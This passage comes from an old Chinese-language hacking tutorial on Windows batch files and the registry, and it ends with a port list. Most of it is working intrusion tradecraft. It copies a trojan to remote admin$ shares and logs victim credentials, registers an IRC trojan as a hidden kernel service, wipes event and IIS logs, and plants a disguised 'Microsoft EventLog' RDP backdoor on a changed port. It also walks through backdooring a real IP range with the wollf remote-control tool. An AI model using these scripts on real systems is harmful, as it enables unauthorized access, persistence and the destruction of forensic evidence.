在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb && copy
file://192.168.0.1/database/backup.mdb E:\backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :)
3.||
Usage:第一条命令 || 第二条命令 [|| 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
组合命令使用的例子:
sample:
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1
USER %2 PASS %3 >>victim.txt
四、管道命令的使用
1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。
2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与
>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:
运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt
dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32
/u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。
No.5
五.如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname=
WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
六.精彩实例放送。
1.删除win2k/xp系统默认共享的批处理
------------------------ cut here then save as .bat or .cmd file
---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>
c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default
properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the
command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file
---------------------------
2.全面加固系统(给肉鸡打补丁)的批处理文件
------------------------ cut here then save as .bat or .cmd file
---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
>>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
>>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
>>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file
---------------------------
下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
>>patch.dll
@echo
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
>>patch.dll
@echo
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
>>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。"
>>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
开启3389终端方法和常见问题:
第一种方法:
使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)
2:用rots.vbs开启终端服务
说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr
三:常见问题:
1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.
2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.
3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
第二种方法:
进入后:TELNET上去!
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK
或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql
echo TSEnable = on >>
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)
利用at time 获取对方服务器时间。
copy 路径:\xxx.bat \\ip地址\$c:\winnt
at time 00:00:00 xxx.bat
服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!
第三种方法:
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s file://检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s file://检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
file://这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
file://检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
问题和建议:
A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.
B 一次不行可以再试一次,在实际中很有作用.
C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
第四种方法:
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内
容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......
---------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
---------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。
----------------------------------------------------
[server@D:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
-----------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。
----------------------------------------------------
D:\WINNT\system32>cd..
cd..
D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615
D:\WINNT 的目录
2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节
D:\WINNT>hbulot
hbulot
---------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。
D:\WINNT>exit
exit
Command "DOS" succeed.
[server@D:\WINNT\system32]#reboot
Command "REBOOT" succeed.
[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下
。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装
终端服务。
到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!
我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对
目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口
来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
第五种方法:
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:
-------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
-----------
2.重新起动"肉机"。
3.使用本地的3398客户端,连接 "肉机" .
4.优(缺)点:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.
二.抛砖引玉性"隐蔽"安装:
1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"
2.将如下注册表键值导入 "肉机" 的注册表中:
------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
---------------
3.重新起动"肉机"。
4.使用本地的3398客户端,连接“肉机”。
5.优(缺)点:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".
三.理论简介
如此简单? 只修改注册表? 不需要拷贝W2k源文件?
让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------
首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:
"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"
这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".
打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.
在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.
为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.
各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.
"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.
"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.
我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?
"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".
"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.
我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.
[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?
常用端口说明:
再介绍端口前,先看一下端口的基本知道吧。
1.公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
2. 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
3. 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
1 tcpmux TCP Port Service Multiplexer 传输控制协议端口服务多路开关选择器
2 compressnet Management Utility compressnet 管理实用程序
3 compressnet Compression Process 压缩进程
5 rje Remote Job Entry 远程作业登录
7 echo Echo 回显
9 discard Discard 丢弃
11 systat Active Users 在线用户
13 daytime Daytime 时间
17 qotd Quote of the Day 每日引用
18 msp Message Send Protocol 消息发送协议
19 chargen Character Generator 字符发生器
20 ftp-data File Transfer [Default Data] 文件传输协议(默认数据口)
21 ftp File Transfer [Control] 文件传输协议(控制)
22 ssh SSH Remote Login Protocol SSH远程登录协议
23 telnet Telnet 终端仿真协议
24 ? any private mail system 预留给个人用邮件系统
25 smtp Simple Mail Transfer 简单邮件发送协议
27 nsw-fe NSW User System FE NSW 用户系统现场工程师
29 msg-icp MSG ICP MSG ICP
31 msg-auth MSG Authentication MSG验证
33 dsp Display Support Protocol 显示支持协议
35 ? any private printer server 预留给个人打印机服务
37 time Time 时间
38 rap Route Access Protocol 路由访问协议
39 rlp Resource Location Protocol 资源定位协议
41 graphics Graphics 图形
42 nameserver WINS Host Name Server WINS 主机名服务
43 nicname Who Is "绰号" who is服务
44 mpm-flags MPM FLAGS Protocol MPM(消息处理模块)标志协议
45 mpm Message Processing Module [recv] 消息处理模块
46 mpm-snd MPM [default send] 消息处理模块(默认发送口)
47 ni-ftp NI FTP NI FTP
48 auditd Digital Audit Daemon 数码音频后台服务
49 tacacs Login Host Protocol (TACACS) TACACS登录主机协议
50 re-mail-ck Remote Mail Checking Protocol 远程邮件检查协议
51 la-maint IMP Logical Address Maintenance IMP(接口信息处理机)逻辑地址维护
52 xns-time XNS Time Protocol 施乐网络服务系统时间协议
53 domain Domain Name Server 域名服务器
54 xns-ch XNS Clearinghouse 施乐网络服务系统票据交换
55 isi-gl ISI Graphics Language ISI图形语言
56 xns-auth XNS Authentication 施乐网络服务系统验证
57 ? any private terminal access 预留个人用终端访问
58 xns-mail XNS Mail 施乐网络服务系统邮件
59 ? any private file service 预留个人文件服务
60 ? Unassigned 未定义
61 ni-mail NI MAIL NI邮件?
62 acas ACA Services 异步通讯适配器服务
63 whois+ whois+ WHOIS+
64 covia Communications Integrator (CI) 通讯接口
65 tacacs-ds TACACS-Database Service TACACS数据库服务
66 sql*net Oracle SQL*NET Oracle SQL*NET
67 bootps Bootstrap Protocol Server 引导程序协议服务端
68 bootpc Bootstrap Protocol Client 引导程序协议客户端
69 tftp Trivial File Transfer 小型文件传输协议
70 gopher Gopher 信息检索协议
71 netrjs-1 Remote Job Service 远程作业服务
72 netrjs-2 Remote Job Service 远程作业服务
73 netrjs-3 Remote Job Service 远程作业服务
74 netrjs-4 Remote Job Service 远程作业服务
75 ? any private dial out service 预留给个人拨出服务
76 deos Distributed External Object Store 分布式外部对象存储
77 ? any private RJE service 预留给个人远程作业输入服务
78 vettcp vettcp 修正TCP?
79 finger Finger FINGER(查询远程主机在线用户等信息)
80 http World Wide Web HTTP 全球信息网超文本传输协议
81 hosts2-ns HOSTS2 Name Server HOST2名称服务
